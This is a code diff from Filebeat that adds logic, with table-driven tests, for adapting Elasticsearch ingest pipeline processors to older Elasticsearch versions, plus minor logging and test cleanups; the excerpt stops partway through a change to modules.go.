-825,6 +825,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] - Move aws-s3 input to GA. {pull}23631[23631] - Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by + removing unsupported processors. {pull}23763[23763] - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] - Added string splitting for httpjson input {pull}24022[24022] diff --git a/filebeat/fileset/compatibility.go b/filebeat/fileset/compatibility.go new file mode 100644 index 000000000000..210c93e1b4c4 --- /dev/null +++ b/filebeat/fileset/compatibility.go @@ -0,0 +1,224 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package fileset + +import ( + "fmt" + "strings" + + "github.com/pkg/errors" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/logp" +) + +// processorCompatibility defines a processor's minimum version requirements or +// a transformation to make it compatible. +type processorCompatibility struct { + checkVersion func(esVersion *common.Version) bool // Version check returns true if this check applies. + procType string // Elasticsearch Ingest Node processor type. + adaptConfig func(processor map[string]interface{}, log *logp.Logger) (drop bool, err error) // Adapt the configuration to make it compatible. +} + +var processorCompatibilityChecks = []processorCompatibility{ + { + procType: "append", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.10.0")) + }, + adaptConfig: replaceAppendAllowDuplicates, + }, + { + procType: "community_id", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.12.0")) + }, + adaptConfig: deleteProcessor, + }, + { + procType: "set", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.9.0")) + }, + adaptConfig: replaceSetIgnoreEmptyValue, + }, + { + procType: "uri_parts", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.12.0")) + }, + adaptConfig: deleteProcessor, + }, + { + procType: "user_agent", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("7.0.0")) && + !esVersion.LessThan(common.MustNewVersion("6.7.0")) + }, + adaptConfig: func(config map[string]interface{}, _ *logp.Logger) (bool, error) { + config["ecs"] = true + return false, nil + }, + }, + { + procType: "user_agent", + checkVersion: func(esVersion *common.Version) bool { + return esVersion.LessThan(common.MustNewVersion("6.7.0")) + }, + adaptConfig: func(config map[string]interface{}, _ *logp.Logger) (bool, error) { + return false, errors.New("user_agent processor requires option 'ecs: true', Elasticsearch 6.7 or newer required") + }, + }, +} + +// adaptPipelineForCompatibility iterates over all processors in the pipeline +// and adapts them for version of Elasticsearch used. Adapt can mean modifying +// processor options or removing the processor. +func adaptPipelineForCompatibility(esVersion common.Version, pipelineID string, content map[string]interface{}, log *logp.Logger) error { + p, ok := content["processors"] + if !ok { + return errors.New("'processors' is missing from the pipeline definition") + } + + processors, ok := p.([]interface{}) + if !ok { + return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) + } + + var filteredProcs []interface{} + +nextProcessor: + for i, obj := range processors { + processor, ok := obj.(map[string]interface{}) + if !ok { + return fmt.Errorf("processor at index %d is not an object, got %T", i, obj) + } + + for _, proc := range processorCompatibilityChecks { + configIfc, found := processor[proc.procType] + if !found { + continue + } + config, ok := configIfc.(map[string]interface{}) + if !ok { + return fmt.Errorf("processor config at index %d is not an object, got %T", i, obj) + } + + if !proc.checkVersion(&esVersion) { + continue + } + + drop, err := proc.adaptConfig(config, log.With("processor_type", proc.procType, "processor_index", i)) + if err != nil { + return fmt.Errorf("failed to adapt %q processor at index %d: %w", proc.procType, i, err) + } + if drop { + continue nextProcessor + } + } + + filteredProcs = append(filteredProcs, processors[i]) + } + + content["processors"] = filteredProcs + return nil +} + +// deleteProcessor returns true to indicate that the processor should be deleted +// in order to adapt the pipeline for backwards compatibility to Elasticsearch. +func deleteProcessor(_ map[string]interface{}, _ *logp.Logger) (bool, error) { return true, nil } + +// replaceSetIgnoreEmptyValue replaces ignore_empty_value option with an if +// statement so ES less than 7.9 will work. +func replaceSetIgnoreEmptyValue(config map[string]interface{}, log *logp.Logger) (bool, error) { + _, ok := config["ignore_empty_value"].(bool) + if !ok { + return false, nil + } + + log.Debug("Removing unsupported 'ignore_empty_value' from set processor.") + delete(config, "ignore_empty_value") + + _, ok = config["if"].(string) + if ok { + // assume if check is sufficient + return false, nil + } + val, ok := config["value"].(string) + if !ok { + return false, nil + } + + newIf := strings.TrimLeft(val, "{ ") + newIf = strings.TrimRight(newIf, "} ") + newIf = strings.ReplaceAll(newIf, ".", "?.") + newIf = "ctx?." + newIf + " != null" + + log.Debug("Adding if %s to replace 'ignore_empty_value' in set processor.", newIf) + config["if"] = newIf + return false, nil +} + +// replaceAppendAllowDuplicates replaces allow_duplicates option with an if statement +// so ES less than 7.10 will work. +func replaceAppendAllowDuplicates(config map[string]interface{}, log *logp.Logger) (bool, error) { + allow, ok := config["allow_duplicates"].(bool) + if !ok { + return false, nil + } + + log.Debug("Removing unsupported 'allow_duplicates' from append processor.") + delete(config, "allow_duplicates") + + if allow { + // It was set to true, nothing else to do after removing the option. + return false, nil + } + + currIf, _ := config["if"].(string) + if strings.Contains(strings.ToLower(currIf), "contains") { + // If it has a contains statement, we assume it is checking for duplicates already. + return false, nil + } + field, ok := config["field"].(string) + if !ok { + return false, nil + } + val, ok := config["value"].(string) + if !ok { + return false, nil + } + + field = strings.ReplaceAll(field, ".", "?.") + + val = strings.TrimLeft(val, "{ ") + val = strings.TrimRight(val, "} ") + val = strings.ReplaceAll(val, ".", "?.") + + if currIf == "" { + // if there is not a previous if we add a value sanity check + currIf = fmt.Sprintf("ctx?.%s != null", val) + } + + newIf := fmt.Sprintf("%s && ((ctx?.%s instanceof List && !ctx?.%s.contains(ctx?.%s)) || ctx?.%s != ctx?.%s)", currIf, field, field, val, field, val) + + log.Debug("Adding if %s to replace 'allow_duplicates: false' in append processor.", newIf) + config["if"] = newIf + + return false, nil +} diff --git a/filebeat/fileset/compatibility_test.go b/filebeat/fileset/compatibility_test.go new file mode 100644 index 000000000000..bc089879082b --- /dev/null +++ b/filebeat/fileset/compatibility_test.go @@ -0,0 +1,643 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build !integration + +package fileset + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/logp" +) + +func TestAdaptPipelineForCompatibility(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 6.7.0", + esVersion: common.MustNewVersion("6.6.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }}, + isErrExpected: true, + }, + { + name: "ES == 6.7.0", + esVersion: common.MustNewVersion("6.7.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + "ecs": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES >= 7.0.0", + esVersion: common.MustNewVersion("7.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "rename": map[string]interface{}{ + "field": "foo.src_ip", + "target_field": "source.ip", + }, + }, + map[string]interface{}{ + "user_agent": map[string]interface{}{ + "field": "foo.http_user_agent", + }, + }, + }, + }, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content) + } + }) + } +} + +func TestReplaceSetIgnoreEmptyValue(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.9.0", + esVersion: common.MustNewVersion("7.8.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.9.0", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES > 7.9.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "existing if", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": true, + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ignore_empty_value is false", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "ignore_empty_value": false, + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "value": "{{panw.panos.ruleset}}", + "if": "ctx?.panw?.panos?.ruleset != null", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "no value", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + "ignore_empty_value": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "rule.name", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} + +func TestReplaceAppendAllowDuplicates(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.10.0: set to true", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": true, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: set to false", + esVersion: common.MustNewVersion("7.9.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.10.0", + esVersion: common.MustNewVersion("7.10.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES > 7.10.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: existing if", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + "if": "ctx?.host?.hostname != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: existing if with contains", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: no value", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} + +func TestRemoveURIPartsProcessor(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.12.0", + esVersion: common.MustNewVersion("7.11.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.12.0", + esVersion: common.MustNewVersion("7.12.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES > 7.12.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} diff --git a/filebeat/fileset/config_test.go b/filebeat/fileset/config_test.go index 972d7eff6319..ecefac2e181c 100644 --- a/filebeat/fileset/config_test.go +++ b/filebeat/fileset/config_test.go @@ -21,6 +21,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/common" ) @@ -34,7 +35,7 @@ func TestInputSettings(t *testing.T) { } c, err := common.NewConfigFrom(cfg) - assert.NoError(t, err) + require.NoError(t, err) f, err := NewFilesetConfig(c) if assert.NoError(t, err) { diff --git a/filebeat/fileset/factory.go b/filebeat/fileset/factory.go index b0656205321e..43aa8e1636ed 100644 --- a/filebeat/fileset/factory.go +++ b/filebeat/fileset/factory.go @@ -57,6 +57,7 @@ type inputsRunner struct { pipelineLoaderFactory PipelineLoaderFactory pipelineCallbackID uuid.UUID overwritePipelines bool + log *logp.Logger } // NewFactory instantiates a new Factory @@ -84,7 +85,9 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru // Hash module ID var h map[string]interface{} - c.Unpack(&h) + if err = c.Unpack(&h); err != nil { + return nil, fmt.Errorf("failed to unpack config: %w", err) + } id, err := hashstructure.Hash(h, nil) if err != nil { return nil, err @@ -94,8 +97,7 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru for i, pConfig := range pConfigs { inputs[i], err = f.inputFactory.Create(p, pConfig) if err != nil { - logp.Err("Error creating input: %s", err) - return nil, err + return nil, fmt.Errorf("failed to create input: %w", err) } } @@ -106,6 +108,7 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru pipelineLoaderFactory: f.pipelineLoaderFactory, pipelineCallbackID: f.pipelineCallbackID, overwritePipelines: f.overwritePipelines, + log: logp.NewLogger(logName), }, nil } @@ -118,8 +121,7 @@ func (f *Factory) CheckConfig(c *common.Config) error { for _, pConfig := range pConfigs { err = f.inputFactory.CheckConfig(pConfig) if err != nil { - logp.Err("Error checking input configuration: %s", err) - return err + return fmt.Errorf("error checking input configuration: %w", err) } } @@ -153,12 +155,12 @@ func (p *inputsRunner) Start() { // makes it possible to try to load pipeline when ES becomes reachable. pipelineLoader, err := p.pipelineLoaderFactory() if err != nil { - logp.Err("Error loading pipeline: %s", err) + p.log.Errorf("Error loading pipeline: %s", err) } else { err := p.moduleRegistry.LoadPipelines(pipelineLoader, p.overwritePipelines) if err != nil { // Log error and continue - logp.Err("Error loading pipeline: %s", err) + p.log.Errorf("Error loading pipeline: %s", err) } } @@ -168,7 +170,7 @@ func (p *inputsRunner) Start() { } p.pipelineCallbackID, err = elasticsearch.RegisterConnectCallback(callback) if err != nil { - logp.Err("Error registering connect callback for Elasticsearch to load pipelines: %v", err) + p.log.Errorf("Error registering connect callback for Elasticsearch to load pipelines: %v", err) } } diff --git a/filebeat/fileset/fileset_test.go b/filebeat/fileset/fileset_test.go index 4a8087af2b48..430d71e0db7a 100644 --- a/filebeat/fileset/fileset_test.go +++ b/filebeat/fileset/fileset_test.go @@ -26,9 +26,8 @@ import ( "testing" "text/template" - "github.com/stretchr/testify/require" - "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -43,9 +42,9 @@ func makeTestInfo(version string) beat.Info { func getModuleForTesting(t *testing.T, module, fileset string) *Fileset { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) fs, err := New(modulesPath, fileset, &ModuleConfig{Module: module}, &FilesetConfig{}) - assert.NoError(t, err) + require.NoError(t, err) return fs } @@ -54,7 +53,7 @@ func TestLoadManifestNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") manifest, err := fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, manifest.ModuleVersion, "1.0") assert.Equal(t, manifest.IngestPipeline, []string{"ingest/pipeline.yml"}) assert.Equal(t, manifest.Input, "config/nginx-access.yml") @@ -69,7 +68,7 @@ func TestGetBuiltinVars(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") vars, err := fs.getBuiltinVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) assert.IsType(t, vars["hostname"], "a-mac-with-esc-key") assert.IsType(t, vars["domain"], "local") @@ -83,10 +82,10 @@ func TestEvaluateVarsNginx(t *testing.T) { var err error fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) builtin := vars["builtin"].(map[string]interface{}) assert.IsType(t, "a-mac-with-esc-key", builtin["hostname"]) @@ -97,19 +96,19 @@ func TestEvaluateVarsNginx(t *testing.T) { func TestEvaluateVarsNginxOverride(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) fs, err := New(modulesPath, "access", &ModuleConfig{Module: "nginx"}, &FilesetConfig{ Var: map[string]interface{}{ "pipeline": "no_plugins", }, }) - assert.NoError(t, err) + require.NoError(t, err) fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "no_plugins", vars["pipeline"]) } @@ -119,10 +118,10 @@ func TestEvaluateVarsMySQL(t *testing.T) { var err error fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) builtin := vars["builtin"].(map[string]interface{}) assert.IsType(t, "a-mac-with-esc-key", builtin["hostname"]) @@ -172,29 +171,29 @@ func TestResolveVariable(t *testing.T) { for _, test := range tests { result, err := resolveVariable(test.Vars, test.Value) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.Expected, result) } } func TestGetInputConfigNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) cfg, err := fs.getInputConfig() - assert.NoError(t, err) + require.NoError(t, err) assert.True(t, cfg.HasField("paths")) assert.True(t, cfg.HasField("exclude_files")) assert.True(t, cfg.HasField("pipeline")) pipelineID, err := cfg.String("pipeline", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "filebeat-5.2.0-nginx-access-pipeline", pipelineID) } func TestGetInputConfigNginxOverrides(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) tests := map[string]struct { input map[string]interface{} @@ -216,7 +215,7 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { require.True(t, v) pipelineID, err := c.String("pipeline", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "filebeat-5.2.0-nginx-access-pipeline", pipelineID) }, }, @@ -242,12 +241,12 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { fs, err := New(modulesPath, "access", &ModuleConfig{Module: "nginx"}, &FilesetConfig{ Input: test.input, }) - assert.NoError(t, err) + require.NoError(t, err) - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) cfg, err := fs.getInputConfig() - assert.NoError(t, err) + require.NoError(t, err) assert.True(t, cfg.HasField("paths")) assert.True(t, cfg.HasField("exclude_files")) @@ -256,11 +255,11 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { test.expectedFn(t, cfg) moduleName, err := cfg.String("_module_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "nginx", moduleName) filesetName, err := cfg.String("_fileset_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "access", filesetName) }) } @@ -268,11 +267,11 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { func TestGetPipelineNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) version := common.MustNewVersion("5.2.0") pipelines, err := fs.GetPipelines(*version) - assert.NoError(t, err) + require.NoError(t, err) assert.Len(t, pipelines, 1) pipeline := pipelines[0] @@ -286,7 +285,7 @@ func TestGetTemplateFunctions(t *testing.T) { "builtin": map[string]interface{}{}, } templateFunctions, err := getTemplateFunctions(vars) - assert.NoError(t, err) + require.NoError(t, err) assert.IsType(t, template.FuncMap{}, templateFunctions) assert.Contains(t, templateFunctions, "inList") assert.Contains(t, templateFunctions, "tojson") diff --git a/filebeat/fileset/modules.go b/filebeat/fileset/modules.go index aa0260031cea..3df41999f8fb 100644 --- a/filebeat/fileset/modules.go +++ b/filebeat/fileset/modules.go @@ -26,7 +26,7 @@ import ( "strings" "github.com/pkg/errors" - yaml "gopkg.in/yaml.v2" + "gopkg.in/yaml.v2" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -34,13 +34,11 @@ import ( "github.com/elastic/beats/v7/libbeat/paths" ) -var availableMLModules = map[string]string{ - "apache": "access", - "nginx": "access", -} +const logName = "modules" type ModuleRegistry struct { registry map[string]map[string]*Fileset // module -> fileset -> Fileset + log *logp.Logger } // newModuleRegistry reads and loads the configured module into the registry. @@ -49,25 +47,26 @@ func newModuleRegistry(modulesPath string, overrides *ModuleOverrides, beatInfo 